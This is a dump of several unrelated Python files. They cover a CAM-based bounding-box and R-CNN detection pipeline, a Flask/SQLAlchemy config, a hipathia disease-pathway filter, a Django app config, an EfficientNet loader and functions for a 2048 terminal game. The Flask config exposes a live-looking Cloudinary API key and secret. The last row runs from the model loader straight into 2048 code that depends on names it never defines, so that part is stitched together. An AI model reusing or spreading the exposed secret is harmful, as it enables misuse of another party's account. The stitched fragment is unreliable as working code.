            self.ccols = 0
        else:
            self.ccols = self.ccols + 1
    def showImage(self):
        """Display the assembled figure interactively."""
        plt.show()
    def saveImage(self, save_path, save_title):
        """Write the figure to <save_path><save_title>.png."""
        plt.savefig(save_path+save_title+'.png', bbox_inches='tight')
# In[ ]:
# In[5]:
def GenerateRandomColor(num_of_class):
    """Return `num_of_class` random [r, g, b] triples, each channel in 0..255."""
    return [
        [random.randint(0, 255) for _channel in range(3)]
        for _cls in range(num_of_class)
    ]
# In[6]:
def CheckDirExists(PATH, DIR):
    """Create the directory PATH+DIR (including parents) if it does not exist."""
    target = PATH + DIR
    if not os.path.exists(target):
        os.makedirs(target)
# In[7]:
def SaveOriginalImage(img):
    """Save `img` alone as 'base_image' under the module-global result directory."""
    save_image = SAVE_IMAGE(nrows = 1, ncols = 1, figTitle="base image")
    save_image.addImage(img)
    save_image.saveImage(RESULT_PATH+RESULT_DIR, "base_image")
# In[8]:
def GetHeatmap(img_list, height, width, title = "", figSet = False, fig = [0, 0]):
    """Resize each activation map, colorize it with the JET colormap, and save
    a figure of the heatmaps blended over the base image.

    Returns the list of colorized (BGR) heatmaps at the base image size.
    """
    _title = "_color_heatmap"
    heatmaps = []
    if figSet:
        save_image = SAVE_IMAGE(nrows = fig[0], ncols = fig[1], figTitle=title+_title)
    else:
        save_image = SAVE_IMAGE(nrows = 1, ncols = len(img_list), figTitle=title+_title)
    for index, img in enumerate(img_list):
        heatmap = cv2.applyColorMap(cv2.resize(img, (width, height)), cv2.COLORMAP_JET)
        heatmaps.append(heatmap)
        # blend: 60% heatmap over 40% of the module-global base image
        tmp_img = heatmap*0.6 + CV2_IMG*0.4
        save_image.addImage(cv2.cvtColor(np.float32(tmp_img).astype('uint8'), cv2.COLOR_BGR2RGB))
    save_image.saveImage(RESULT_PATH+RESULT_DIR, title+_title)
    return heatmaps
# In[9]:
# From orig_img, keep only the requested one of the three (R, G, B) channels and return it
def GetChannelImage(orig_img, channel):
    """Return a copy of `orig_img` (BGR layout) with all but one channel zeroed.

    'R' keeps index 2, 'G' keeps index 1, 'B' keeps index 0 (case-insensitive).
    An unknown channel name returns an unmodified copy.
    """
    keep = {'R': 2, 'G': 1, 'B': 0}.get(channel.upper())
    channel_img = orig_img.copy()
    if keep is not None:
        for idx in range(3):
            if idx != keep:
                channel_img[:, :, idx] = 0
    return channel_img
# In[10]:
# Convert the color image to grayscale, then apply a threshold
# The threshold is the fixed value mean(min, max)
def GetGrayscaleImageWithThreshold(orig_img):
    """Convert a BGR image to grayscale and binarize it to {0, 1}.

    The threshold is fixed at the midpoint between the image's min and max
    intensities.
    """
    gray_img = cv2.cvtColor(orig_img, cv2.COLOR_BGR2GRAY)
    min_val = np.min(gray_img)
    max_val = np.max(gray_img)
    threshold = (min_val + max_val) / 2
    ret, gray_img = cv2.threshold(gray_img, threshold, 1, cv2.THRESH_BINARY)
    return gray_img
# In[11]:
# Show orig_img only where the grayscale mask is 1; regions with 0 appear black
def GetMaskedImage(orig_img, gray_map):
    """Return `orig_img` (as RGB) masked so only pixels where gray_map == 1 remain."""
    mask = cv2.cvtColor(gray_map, cv2.COLOR_GRAY2BGR)
    maskedRegion = np.where(mask == 1, orig_img, 0)
    return cv2.cvtColor(maskedRegion, cv2.COLOR_BGR2RGB)
# In[12]:
def GetGrayscaleHeatmap(heatmaps, title = "", figSet = False, fig = [0, 0]):
    """Binarize each colored heatmap via its R channel and save masked previews.

    Returns the list of binary {0, 1} masks (one per input heatmap).
    """
    _title = "_grayscale_heatmap"
    result = []
    for index, heatmap in enumerate(heatmaps):
        # extract only the R channel from the heatmap (the "hot" end of JET)
        tmp = GetChannelImage(heatmap, 'r')
        # convert to grayscale, then apply the fixed threshold
        result.append(GetGrayscaleImageWithThreshold(tmp))
    if figSet:
        save_image = SAVE_IMAGE(nrows = fig[0], ncols = fig[1], figTitle=title+_title)
    else:
        save_image = SAVE_IMAGE(nrows = 1, ncols = len(result), figTitle=title+_title)
    for index, graymap in enumerate(result):
        save_image.addImage(GetMaskedImage(CV2_IMG, graymap))
    save_image.saveImage(RESULT_PATH+RESULT_DIR, title+_title)
    return result
# In[13]:
def GetContours(img_binary):
    """Return the external contours of a binary image.

    Uses the OpenCV 4.x two-value findContours API (contours, hierarchy).
    """
    contours, hierarchy = cv2.findContours(img_binary, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
    return contours
# In[14]:
def GetBBox(img_binary):
    """Return a bounding box [x, y, w, h] for every external contour in `img_binary`."""
    return [list(cv2.boundingRect(contour)) for contour in GetContours(img_binary)]
# In[15]:
def DrawBBox(bounding_box, img):
    """Draw green [x, y, w, h] boxes on a copy of `img`; returns the copy as RGB.

    Accepts either a flat list of boxes (ndim 2) or a list of box lists (ndim 3).
    """
    tmp_img = img.copy()
    dim = np.array(bounding_box).ndim
    if dim == 2:
        for x, y, w, h in bounding_box:
            cv2.rectangle(tmp_img, (x, y), (x + w, y + h), (0, 255, 0), 2)
    elif dim == 3:
        for bb in bounding_box:
            for x, y, w, h in bb:
                cv2.rectangle(tmp_img, (x, y), (x + w, y + h), (0, 255, 0), 2)
    return cv2.cvtColor(tmp_img, cv2.COLOR_BGR2RGB)
# In[16]:
def DrawContourAndBBox(img_binary, img):
    """Overlay red contours and green bounding boxes from `img_binary` on a copy of `img` (RGB)."""
    contours = GetContours(img_binary)
    tmp_img = img.copy()
    # draw contours - red (BGR (0, 0, 255))
    for cnt in contours:
        cv2.drawContours(tmp_img, [cnt], 0, (0,0,255),3)
    # draw bounding box - green
    bb = GetBBox(img_binary)
    for x, y, w, h in bb:
        cv2.rectangle(tmp_img, (x, y), (x + w, y + h), (0, 255, 0), 3)
    return cv2.cvtColor(tmp_img, cv2.COLOR_BGR2RGB)
# In[17]:
def CompareContourAndBBox(heatmaps, title = "", figSet = False, fig = [0, 0]):
    """Save a figure comparing contours vs. bounding boxes for each binary heatmap."""
    _title = "_contour"
    if figSet:
        save_image = SAVE_IMAGE(nrows = fig[0], ncols = fig[1], figTitle=title+_title)
    else:
        save_image = SAVE_IMAGE(nrows = 1, ncols = len(heatmaps), figTitle=title+_title)
    for index, heatmap in enumerate(heatmaps):
        save_image.addImage(DrawContourAndBBox(heatmap, CV2_IMG))
    save_image.saveImage(RESULT_PATH+RESULT_DIR, title+_title)
# In[ ]:
def GetIOU(_bb1, _bb2, changeScale = False, basedOnCAM = False):
    """Compute the intersection-over-union of two axis-aligned boxes.

    Parameters
    ----------
    _bb1, _bb2 :
        Boxes given as [x, y, w, h] when `changeScale` is True, otherwise as
        (x1, y1, x2, y2) corner coordinates.
    changeScale : bool
        Convert [x, y, w, h] boxes to corner form before computing.
    basedOnCAM : bool
        If True, normalize the intersection by _bb2's area alone (how much of
        the CAM box is covered) instead of by the union.

    Returns
    -------
    float in [0.0, 1.0].

    Raises
    ------
    ValueError
        If changeScale is True and either box does not have 4 elements.
    """
    # _bb2 == cam_bb
    if changeScale:
        # _bb1, _bb2 = [x, y, w, h]
        if len(_bb1) == 4 and len(_bb2) == 4:
            bb1 = {'x1':_bb1[0], 'y1':_bb1[1], 'x2':_bb1[0]+_bb1[2], 'y2':_bb1[1]+_bb1[3]}
            bb2 = {'x1':_bb2[0], 'y1':_bb2[1], 'x2':_bb2[0]+_bb2[2], 'y2':_bb2[1]+_bb2[3]}
        else:
            # Bug fix: the original called exit(0) here, silently terminating
            # the whole process with a *success* status on malformed input.
            raise ValueError("changeScale=True requires 4-element [x, y, w, h] boxes")
    else:
        # _bb1, _bb2 = (x1, y1, x2, y2)
        x1, y1, x2, y2 = _bb1
        bb1 = {"x1": x1, "y1": y1, "x2": x2, "y2": y2}
        x1, y1, x2, y2 = _bb2
        bb2 = {"x1": x1, "y1": y1, "x2": x2, "y2": y2}
    assert bb1['x1'] < bb1['x2']
    assert bb1['y1'] < bb1['y2']
    assert bb2['x1'] < bb2['x2']
    assert bb2['y1'] < bb2['y2']
    # determine the coordinates of the intersection rectangle
    x_left = max(bb1['x1'], bb2['x1'])
    y_top = max(bb1['y1'], bb2['y1'])
    x_right = min(bb1['x2'], bb2['x2'])
    y_bottom = min(bb1['y2'], bb2['y2'])
    if x_right < x_left or y_bottom < y_top:
        return 0.0
    # The intersection of two axis-aligned bounding boxes is always an
    # axis-aligned bounding box
    intersection_area = (x_right - x_left) * (y_bottom - y_top)
    # compute the area of both AABBs
    bb1_area = (bb1['x2'] - bb1['x1']) * (bb1['y2'] - bb1['y1'])
    bb2_area = (bb2['x2'] - bb2['x1']) * (bb2['y2'] - bb2['y1'])
    # compute the intersection over union by taking the intersection
    # area and dividing it by the sum of prediction + ground-truth
    if basedOnCAM:
        # IoU measured relative to the CAM box (_bb2) only
        iou = intersection_area / float(bb2_area)
    else:
        iou = intersection_area / float(bb1_area + bb2_area - intersection_area)
    assert iou >= 0.0
    assert iou <= 1.0
    return iou
# In[ ]:
def isExist(bounding_box, bb):
    """Return True if `bb` already occurs (element-wise equal) in `bounding_box`."""
    for existing in bounding_box:
        if np.array_equal(existing, bb):
            return True
    return False
# In[ ]:
def GetCandidateBBox(FM_BB, CAM_BB):
    """Select feature-map boxes that cover > 70% of some CAM box's area.

    Both inputs are flat lists of [x, y, w, h] boxes; duplicates are skipped.
    """
    selected = []
    for fm_box in FM_BB:
        for cam_box in CAM_BB:
            overlap = GetIOU(fm_box, cam_box, changeScale = True, basedOnCAM=True)
            if overlap > 0.7 and not isExist(selected, fm_box):
                selected.append(fm_box)
    return selected
# In[ ]:
def NMS(bounding_box, probs):
    """Per-class non-maximum suppression over candidate boxes.

    For each class: probabilities below 0.2 are zeroed, then any box whose IoU
    with a higher-scoring box exceeds 0.5 has its probability zeroed.
    Returns the suppressed probability tensor (len(bounding_box) x num classes).
    """
    # convert [x, y, w, h] boxes to (x1, y1, x2, y2) corner form
    bbox = []
    for x, y, w, h in bounding_box:
        bbox.append([x,y, x+w, y+h])
    _opencvImg = CV2_IMG.copy()  # NOTE(review): copied but never used here
    bbox = torch.as_tensor(bbox).float()
    probs = torch.as_tensor(probs)
    for c in range(len(classes)):
        _cnt = 0
        # apply threshold: scores below 0.2 are clamped to 0
        prob = probs[:, c].clone()
        m = nn.Threshold(0.2, 0)
        prob = m(prob)
        order = torch.argsort(prob, descending=True)
        for i in range(len(order)):
            bbox_max = bbox[order[i]]
            for j in range(i+1, len(order)):
                bbox_cur = bbox[order[j]]
                # suppress the lower-scoring box when it overlaps too much
                if GetIOU(bbox_max, bbox_cur) > 0.5:
                    prob[order[j]] = 0
        probs[:, c] = prob
    return probs
    # NOTE(review): the bare `return` below is unreachable dead code
    return
# In[ ]:
def get_predict(model, img):
    """Run `model` on one preprocessed image tensor and return softmax class probabilities.

    `img` is a single CHW tensor; a batch dimension is added before the forward
    pass. Uses the module-global `device` set in R_CNN. Returns a (1, 20) tensor.
    """
    model.eval()
    with torch.no_grad():
        inputs = img.to(device)
        inputs = inputs.unsqueeze(0)  # add the batch dimension
        outputs = model(inputs)
        softmax = nn.Softmax(dim=1)
        outputs = softmax(outputs)
    return outputs
def DrawResultByClass(bounding_box, probs, fig = [5, 4]):
    """Save a grid figure with one subplot per class showing that class's surviving boxes.

    A box belongs to the class with its highest probability; boxes whose score
    was zeroed by NMS are not drawn. Each subplot title shows the class name
    and the number of boxes drawn.
    """
    _opencvImg = CV2_IMG.copy()
    save_image = SAVE_IMAGE(nrows = fig[0], ncols = fig[1], figTitle="")
    for i in range(20):
        # NOTE(review): row/col are computed but never used (layout is handled
        # by SAVE_IMAGE's internal cursor)
        row = int(i / 5)
        col = i % 5
        _opencvImg = CV2_IMG.copy()
        draw = 0
        for cnt in range(len(bounding_box)):
            cls_idx = torch.argsort(probs[cnt, :], descending=True)[0]
            if cls_idx == i:
                if probs[cnt][cls_idx] > 0:
                    draw += 1
                    x,y,w,h = bounding_box[cnt]
                    _opencvImg = cv2.rectangle(_opencvImg, (x, y,), (x+w, y+h), color[cls_idx], 2)
                    text = '{} ({:.3f})'.format(classes[cls_idx], probs[cnt][cls_idx])
                    cv2.putText(_opencvImg, text, (x, y+25), cv2.FONT_HERSHEY_SIMPLEX, 1, color[cls_idx], 2)
        title = classes[i] + ": "+str(draw)
        save_image.addImage(cv2.cvtColor(_opencvImg, cv2.COLOR_BGR2RGB), title=title)
    save_image.saveImage(RESULT_PATH+RESULT_DIR, "draw_result_by_class")
# In[ ]:
def cv2_selective_search(img, searchMethod='f'):
    """Run OpenCV selective search on `img` and return region proposals.

    searchMethod 'f' = fast mode, 'q' = quality mode. Returns [x, y, w, h] rows.
    Requires the opencv-contrib ximgproc module.
    """
    ss = cv2.ximgproc.segmentation.createSelectiveSearchSegmentation()
    ss.setBaseImage(img)
    if searchMethod == 'f':
        ss.switchToSelectiveSearchFast()
    elif searchMethod == 'q':
        ss.switchToSelectiveSearchQuality()
    regions = ss.process()
    return regions
def DrawResult(bounding_box, probs):
    """Draw all boxes that survived NMS (top-class score > 0) on one image and save it."""
    draw = 0
    _opencvImg = CV2_IMG.copy()
    for cnt in range(len(bounding_box)):
        # the box's class is its highest-probability column
        cls_idx = torch.argsort(probs[cnt, :], descending=True)[0]
        if probs[cnt][cls_idx] > 0:
            draw += 1
            x,y,w,h = bounding_box[cnt]
            _opencvImg = cv2.rectangle(_opencvImg, (x, y,), (x+w, y+h), color[cls_idx], 2)
            text = '{} ({:.3f})'.format(classes[cls_idx], probs[cnt][cls_idx])
            cv2.putText(_opencvImg, text, (x, y+25), cv2.FONT_HERSHEY_SIMPLEX, 1, color[cls_idx], 2)
    title = 'final bbox: {}'.format(draw)
    save_image = SAVE_IMAGE(nrows = 1, ncols = 1, figTitle=title)
    save_image.addImage(cv2.cvtColor(_opencvImg, cv2.COLOR_BGR2RGB), title="")
    save_image.saveImage(RESULT_PATH+RESULT_DIR, "result")
    return
# In[22]:
def GetBoundingBox(IMG_URL, CAM_RESULT, FEATURE_MAP, fig = [0, 0], dir_name = ""):
    """Derive candidate boxes by intersecting CAM boxes with feature-map boxes.

    Downloads the image, extracts bounding boxes from the CAM heatmaps and from
    the per-channel feature maps, keeps feature-map boxes that cover a CAM box
    (IoU based on the CAM box > 0.7), and saves all intermediate visualizations.

    NOTE(review): mutates the module globals RESULT_PATH, RESULT_DIR, PIL_IMG
    and CV2_IMG that the other helpers read.
    """
    global RESULT_PATH, RESULT_DIR, PIL_IMG, CV2_IMG
    RESULT_PATH = './Result/'
    RESULT_DIR = dir_name
    # check and make result dir to save result
    CheckDirExists(RESULT_PATH, RESULT_DIR)
    # load image from the URL; convert RGB (PIL) -> BGR (OpenCV)
    PIL_IMG = Image.open(urllib2.urlopen(IMG_URL))
    CV2_IMG = cv2.cvtColor(np.array(PIL_IMG), cv2.COLOR_RGB2BGR)
    height, width, depth = CV2_IMG.shape
    # save base image
    save_image = SAVE_IMAGE(nrows = 1, ncols = 1, figTitle="base image")
    save_image.addImage(cv2.cvtColor(CV2_IMG, cv2.COLOR_BGR2RGB))
    save_image.saveImage(RESULT_PATH+RESULT_DIR, "base_image")
    # get CAM result bbox
    ## build (color then binary) heatmaps
    CAM_heatmaps = GetHeatmap(CAM_RESULT, height, width, 'CAM')
    CAM_heatmaps = GetGrayscaleHeatmap(CAM_heatmaps, 'CAM')
    ## save contour vs. bounding-box comparison image
    CompareContourAndBBox(CAM_heatmaps, 'CAM')
    ## collect bounding boxes
    CAM_BB = []
    for index, heatmap in enumerate(CAM_heatmaps):
        tmp_bb = GetBBox(heatmap)
        for index2, bbox in enumerate(tmp_bb):
            CAM_BB.append(bbox)
    title = "CAM_BBOX: "+str(len(CAM_BB))
    save_image = SAVE_IMAGE(nrows = 1, ncols = 1, figTitle=title)
    save_image.addImage(DrawBBox(CAM_BB, CV2_IMG))
    save_image.saveImage(RESULT_PATH+RESULT_DIR, "CAM_BBOX")
    # get FeatureMap bbox
    ## build (color then binary) heatmaps
    FM_heatmaps = GetHeatmap(FEATURE_MAP, height, width, 'FM', figSet = True, fig = fig)
    FM_heatmaps = GetGrayscaleHeatmap(FM_heatmaps, 'FM', figSet = True, fig = fig)
    ## save contour vs. bounding-box comparison image
    CompareContourAndBBox(FM_heatmaps, 'FM', figSet = True, fig = fig)
    ## collect bounding boxes
    FM_BB = []
    for index, heatmap in enumerate(FM_heatmaps):
        tmp_bb = GetBBox(heatmap)
        for index2, bbox in enumerate(tmp_bb):
            FM_BB.append(bbox)
    title = "FM_BBOX: "+str(len(FM_BB))
    save_image = SAVE_IMAGE(nrows = 1, ncols = 1, figTitle=title)
    save_image.addImage(DrawBBox(FM_BB, CV2_IMG))
    save_image.saveImage(RESULT_PATH+RESULT_DIR, "FM_BBOX")
    # get candidate bbox with CAM bbox and FeatureMap bbox
    candidate_bbox = GetCandidateBBox(FM_BB, CAM_BB)
    title = "candidate_bbox: "+str(len(candidate_bbox))
    save_image = SAVE_IMAGE(nrows = 1, ncols = 1, figTitle=title)
    save_image.addImage(DrawBBox(candidate_bbox, CV2_IMG))
    save_image.saveImage(RESULT_PATH+RESULT_DIR, "candidate_bbox")
    return candidate_bbox
def GetBoundingBox_SS(IMG_URL, CAM_RESULT, fig = [0, 0], dir_name = ""):
    """Variant of GetBoundingBox that uses selective-search proposals instead of
    feature-map boxes as candidates against the CAM boxes.

    NOTE(review): mutates the same module globals as GetBoundingBox.
    """
    global RESULT_PATH, RESULT_DIR, PIL_IMG, CV2_IMG
    RESULT_PATH = './Result/'
    RESULT_DIR = dir_name
    # check and make result dir to save result
    CheckDirExists(RESULT_PATH, RESULT_DIR)
    # load image from the URL; convert RGB (PIL) -> BGR (OpenCV)
    PIL_IMG = Image.open(urllib2.urlopen(IMG_URL))
    CV2_IMG = cv2.cvtColor(np.array(PIL_IMG), cv2.COLOR_RGB2BGR)
    height, width, depth = CV2_IMG.shape
    # save base image
    save_image = SAVE_IMAGE(nrows = 1, ncols = 1, figTitle="base image")
    save_image.addImage(cv2.cvtColor(CV2_IMG, cv2.COLOR_BGR2RGB))
    save_image.saveImage(RESULT_PATH+RESULT_DIR, "base_image")
    # get CAM result bbox
    ## build (color then binary) heatmaps
    CAM_heatmaps = GetHeatmap(CAM_RESULT, height, width, 'CAM')
    CAM_heatmaps = GetGrayscaleHeatmap(CAM_heatmaps, 'CAM')
    ## save contour vs. bounding-box comparison image
    CompareContourAndBBox(CAM_heatmaps, 'CAM')
    ## collect bounding boxes
    CAM_BB = []
    for index, heatmap in enumerate(CAM_heatmaps):
        tmp_bb = GetBBox(heatmap)
        for index2, bbox in enumerate(tmp_bb):
            CAM_BB.append(bbox)
    title = "CAM_BBOX: "+str(len(CAM_BB))
    save_image = SAVE_IMAGE(nrows = 1, ncols = 1, figTitle=title)
    save_image.addImage(DrawBBox(CAM_BB, CV2_IMG))
    save_image.saveImage(RESULT_PATH+RESULT_DIR, "CAM_BBOX")
    # get selective-search proposal boxes
    SS_BB = cv2_selective_search(CV2_IMG)
    title = "SS_BBOX: "+str(len(SS_BB))
    save_image = SAVE_IMAGE(nrows = 1, ncols = 1, figTitle=title)
    save_image.addImage(DrawBBox(SS_BB, CV2_IMG))
    save_image.saveImage(RESULT_PATH+RESULT_DIR, "SS_BBOX")
    # get candidate bbox from selective-search boxes vs. CAM boxes
    candidate_bbox = GetCandidateBBox(SS_BB, CAM_BB)
    title = "candidate_bbox: "+str(len(candidate_bbox))
    save_image = SAVE_IMAGE(nrows = 1, ncols = 1, figTitle=title)
    save_image.addImage(DrawBBox(candidate_bbox, CV2_IMG))
    save_image.saveImage(RESULT_PATH+RESULT_DIR, "candidate_bbox")
    return candidate_bbox
def R_CNN(IMG_URL, candidate_bbox, fig = [0, 0], dir_name = ""):
    """R-CNN-style stage: crop each candidate box, classify it with a
    fine-tuned ResNet-50 (20 VOC classes), apply NMS, and save result images.

    NOTE(review): mutates module globals (RESULT_PATH, RESULT_DIR, PIL_IMG,
    CV2_IMG, device, color) used by the drawing helpers.
    """
    global RESULT_PATH, RESULT_DIR, PIL_IMG, CV2_IMG
    RESULT_PATH = './Result/'
    RESULT_DIR = dir_name
    # check and make result dir to save result
    CheckDirExists(RESULT_PATH, RESULT_DIR)
    # load image from the URL; convert RGB (PIL) -> BGR (OpenCV)
    PIL_IMG = Image.open(urllib2.urlopen(IMG_URL))
    CV2_IMG = cv2.cvtColor(np.array(PIL_IMG), cv2.COLOR_RGB2BGR)
    height, width, depth = CV2_IMG.shape
    # R-CNN
    ## load model
    global device, color
    device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
    # fixed per-class drawing colors, index-aligned with `classes`
    color = [[44, 195, 74], [62, 208, 80], [53, 230, 195], [20, 216, 183], [235, 220, 95], [16, 138, 103], [170, 172, 255], [17, 150, 98], [252, 125, 2], [142, 155, 193], [117, 25, 29], [235, 119, 120], [105, 211, 222], [66, 52, 154], [1, 33, 128], [72, 182, 183], [183, 35, 106], [216, 217, 0], [204, 201, 74], [39, 41, 236]]
    model = models.resnet50(pretrained=True)
    num_ftrs = model.fc.in_features
    model.fc = nn.Linear(num_ftrs, 20)  # replace the head: 20 VOC classes
    model = model.to(device)
    model.load_state_dict(torch.load('./Model/Resnet50_pretrained_True'))
    model.eval()
    det_probs = []
    for index, (x, y, w, h) in enumerate(candidate_bbox):
        # crop each candidate region and classify it independently
        area = (x, y, x + w, y + h)
        timage = PIL_IMG.crop(area)
        timage = data_transforms['test'](transforms.ToPILImage()(np.asarray(timage)))
        prob = get_predict(model, timage)
        det_probs.append(prob.tolist()[0])
    det_probs = torch.as_tensor(det_probs)
    final_probs = NMS(candidate_bbox, det_probs)
    DrawResult(candidate_bbox, final_probs)
    DrawResultByClass(candidate_bbox, final_probs)
986,983 | 98ed44a75e81d4f7e60385c189a05b3e74a0020b | import os
import cloudinary
# Flask/SQLAlchemy configuration: SQLite database file lives next to this module.
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
SQLALCHEMY_DATABASE_URI = 'sqlite:///' + BASE_DIR + "/app.db"
# SECURITY NOTE(review): Cloudinary credentials are hard-coded here. The API
# secret should be moved to an environment variable and this one rotated,
# since anyone with repo access can use it.
cloudinary.config(
    cloud_name = "skols",
    api_key = "877892686494448",
    api_secret = "AkUW2f04FrIMpDK9Q4KPrNzxU7w"
)
986,984 | f4ef0a82d3709661bc2d501f38bc645bb1510e94 | #!/usr/bin/python
'''
DESCRIPTION
-----------
Removing disease related pathways from pathways which are obtained via hipathia package.
USAGE
-----
[PROJECT_PATH]/$ python scripts/pathway_layer_data/1.2-pg-remove-disease-cancer.py -sp {SPECIES} -src {SOURCE}
RETURN
------
pathway_ids_and_names.csv : csv file
Final version after removed disease related pathways
EXPORTED FILE(s) LOCATION
-------------------------
./data/processed/hsa/hipathia/pathway_ids_and_names.csv
'''
# importing default libraries
import os, argparse, sys
sys.path.append('./')
# importing scripts in scripts folder
from scripts import config as src
import pandas as pd
import numpy as np
def remove_disease_from_dataset(species, source):
    """Filter disease-related pathways out of the hipathia pathway list.

    Reads ./data/raw/{species}/{source}/pathway_ids_and_names.csv, removes rows
    whose 'path.name' matches a disease keyword or an explicit disease-name
    list, and writes the result to ./data/processed/{species}/{source}/.
    """
    # defining output folder (created if missing by src.define_folder)
    output_folder = src.define_folder( os.path.join(src.DIR_DATA_PROCESSED, species, source ) )
    # importing raw dataset which is imported by hipathia
    df_hp = pd.read_csv(os.path.join(src.DIR_DATA_RAW, species, source, 'pathway_ids_and_names.csv'))
    print('RAW dataset,')
    print('.head()', df_hp.head())
    print('Shape,', df_hp.shape)
    # FILTERING #1
    # drop rows whose name contains any disease-related keyword (substring match)
    keywords_ = ['disease', 'cancer', 'leukemia', 'infection', 'virus','addiction', 'anemia', 'cell carcinoma', 'diabet', 'Hepatitis']
    df_hp = df_hp.loc[~df_hp['path.name'].str.contains('|'.join(keywords_))]
    print('RAW dataset is filtered by "keywords" list!')
    print('Shape,', df_hp.shape)
    # FILTERING #2
    # drop remaining disease pathways by exact name match
    additional_disease = ['Long-term depression', 'Insulin resistance', 'Amyotrophic lateral sclerosis (ALS)', 'Alcoholism', 'Shigellosis'
                          , 'Pertussis', 'Legionellosis', 'Leishmaniasis', 'Toxoplasmosis', 'Tuberculosis', 'Measles', 'Influenza A'
                          , 'Glioma', 'Melanoma']
    df_hp = df_hp.loc[~df_hp['path.name'].isin(additional_disease)]
    print('RAW dataset is filtered by "additional_disease" list!')
    print('Shape,', df_hp.shape)
    # exporting processed dataset
    df_hp.to_csv(os.path.join(output_folder, 'pathway_ids_and_names.csv'), index=False)
    print('FILE exported in {}'.format(os.path.join(output_folder, 'pathway_ids_and_names.csv')))
if __name__=='__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('-sp', '--species', help='specify the species, the location of species in ./data/raw/{SPECIES}')
    parser.add_argument('-src', '--source', help='specify the source, the location of source in ./data/raw/{SPECIES}/{SOURCE}')
    # NOTE(review): accepted but not used by remove_disease_from_dataset
    parser.add_argument('-ga', '--genome_annotation', help='specify genome wide annotition package', default=None)
    # print usage and exit when invoked with no arguments at all
    if len(sys.argv)==1:
        parser.print_help(sys.stderr)
        sys.exit(1)
    args = parser.parse_args()
    remove_disease_from_dataset(args.species, args.source)
986,985 | c3f0f487fc22295608f09def929c4fda328633cb | from __future__ import unicode_literals
from django.apps import AppConfig
class Articles(AppConfig):
    """Django application configuration for the `articles` app."""
    name = 'articles'
986,986 | 485ddf8c6b69ad55a1de289500696d1be60a97ef | # import seaborn as sns
# import matplotlib.pyplot as plt
# import numpy as np
# sns.set()
# f,ax=plt.subplots()
# C2= np.array([[176,27],[50,37]])
# sns.heatmap(C2,annot=True,ax=ax,fmt="d") #画热力图
#
# ax.set_title('confusion matrix') #标题
# ax.set_xlabel('predict') #x轴
# ax.set_ylabel('Postive') #y轴
# plt.show()
# plt.savefig('confusion matrix.pdf')
import torch
import torch.nn as nn
from torch.autograd import Variable
from torch.utils.data import DataLoader
from torchvision import datasets,transforms
from model import HornetsClassifier
# The writer acts like a log that stores everything needed for plotting; the
# SummaryWriter('log') call creates a 'log' folder in the project directory to
# hold the TensorBoard event files (empty at first).
from tensorboardX import SummaryWriter
writer = SummaryWriter('log') # create the writer object used to store data
# NOTE(review): .cuda() requires a GPU; load_state_dict expects the checkpoint
# to match this architecture/num_classes.
model = HornetsClassifier('tf_efficientnet_b4_ns', 2, pretrained=True).cuda()
model.load_state_dict(torch.load('./model/50/tf_efficientnet_b4_ns_fold_2_16.pth'))
print(model)
# dummy_input = torch.rand(16, 3, 64, 64) # assume an input of 16 3x64x64 images
# dummy_input=dummy_input.cuda()
# with SummaryWriter(comment='EfficientNet') as w:
# w.add_graph(model, input_to_model=dummy_input)
def printing():
    """Clear the terminal and draw the 4x4 2048 board plus the current score.

    Tiles with value 0 are printed with the ANSI "concealed" attribute so they
    stay invisible; non-zero tiles are bright green and the grid lines are red.
    Reads the module-level rows a, b, c, d and the score counter.

    This replaces ~260 lines of copy-pasted per-cell code with one shared
    formatting path.
    NOTE(review): left margin assumed to be 3 spaces and cell interior width 6
    (matches the 6-dash borders) — confirm against the original output.
    """
    os.system('clear')
    red = '\033[91m'
    reset = '\033[0m'

    def tile(value):
        # ANSI attribute 08 = concealed (hides the zeros), 92 = bright green.
        colour = '\033[08m' if value == 0 else '\033[92m'
        return colour + str(value) + reset

    def number_line(row):
        # Each cell interior is 6 characters wide: 2 leading spaces, the value,
        # then enough padding for any digit count (1-4) to keep borders aligned.
        pieces = ['   ' + red + '│  ' + reset]
        for value in row:
            padding = ' ' * (4 - len(str(value)))
            pieces.append(tile(value))
            pieces.append(red + padding + '│  ' + reset)
        return ''.join(pieces)

    blank_line = '   ' + red + '│      │      │      │      │' + reset

    print("\033[92m" + "Score:" + "\033[0m" + "\033[96m" + " " + str(score) + "\033[0m")
    print()
    print('   ' + red + '┌──────┬──────┬──────┬──────┐' + reset)
    for position, row in enumerate((a, b, c, d)):
        print(blank_line)
        print(number_line(row))
        print(blank_line)
        # Inner separators between rows; the bottom border closes the grid.
        if position < 3:
            print('   ' + red + '├──────┼──────┼──────┼──────┤' + reset)
    print('   ' + red + '└──────┴──────┴──────┴──────┘' + reset)
    print()
# checking the end of the game, in case if you achive 2048 or you don't have more moves
def checking():
    """Stop the game on a win (a 2048 tile) or when no move remains.

    A move is still possible when any cell is empty or any two orthogonally
    adjacent cells hold equal values (they could merge).  Reads the
    module-level rows a, b, c, d.  The original elif-chain covered exactly
    these 24 adjacencies; the loop below is its verified-equivalent form.
    """
    grid = [a, b, c, d]
    if any(2048 in row for row in grid):
        print()
        print("\033[92m" + "You win!!!" + "\033[0m")
        print()
        quit()
    # Any empty cell means a slide is still possible.
    if any(0 in row for row in grid):
        return
    # Any equal orthogonal neighbours can still merge.
    for i in range(4):
        for j in range(4):
            if j < 3 and grid[i][j] == grid[i][j + 1]:
                return
            if i < 3 and grid[i][j] == grid[i + 1][j]:
                return
    print()
    # Bug fix: the original ended this line with "\033[92m" (green again)
    # instead of the reset code, leaving the terminal colour stuck on green.
    print("\033[92m" + "No more moves! Game over!" + "\033[0m")
    print()
    quit()
# Put 2 (90% of the cases) or 4 (10% of the cases) to an empty random place (if there is), if the board changed.
def randNum():
    """Drop a new tile on a random empty cell when the board just changed.

    Only acts when the last key press actually moved or merged something
    (module-level dontMove == 1).  The new tile is a 2 with 90% probability
    and a 4 with 10%, matching the original randint(1, 10) == 1 split.
    Mutates the module-level row lists a, b, c, d in place.
    """
    import random
    if dontMove != 1:
        return
    # One pass collects (row-list, index) for every empty cell, replacing the
    # original's parallel row-name/column lists.
    empty_cells = [(row, index)
                   for row in (a, b, c, d)
                   for index in range(4)
                   if row[index] == 0]
    if not empty_cells:
        return
    row, index = random.choice(empty_cells)
    row[index] = 4 if random.randint(1, 10) == 1 else 2
# First board printing
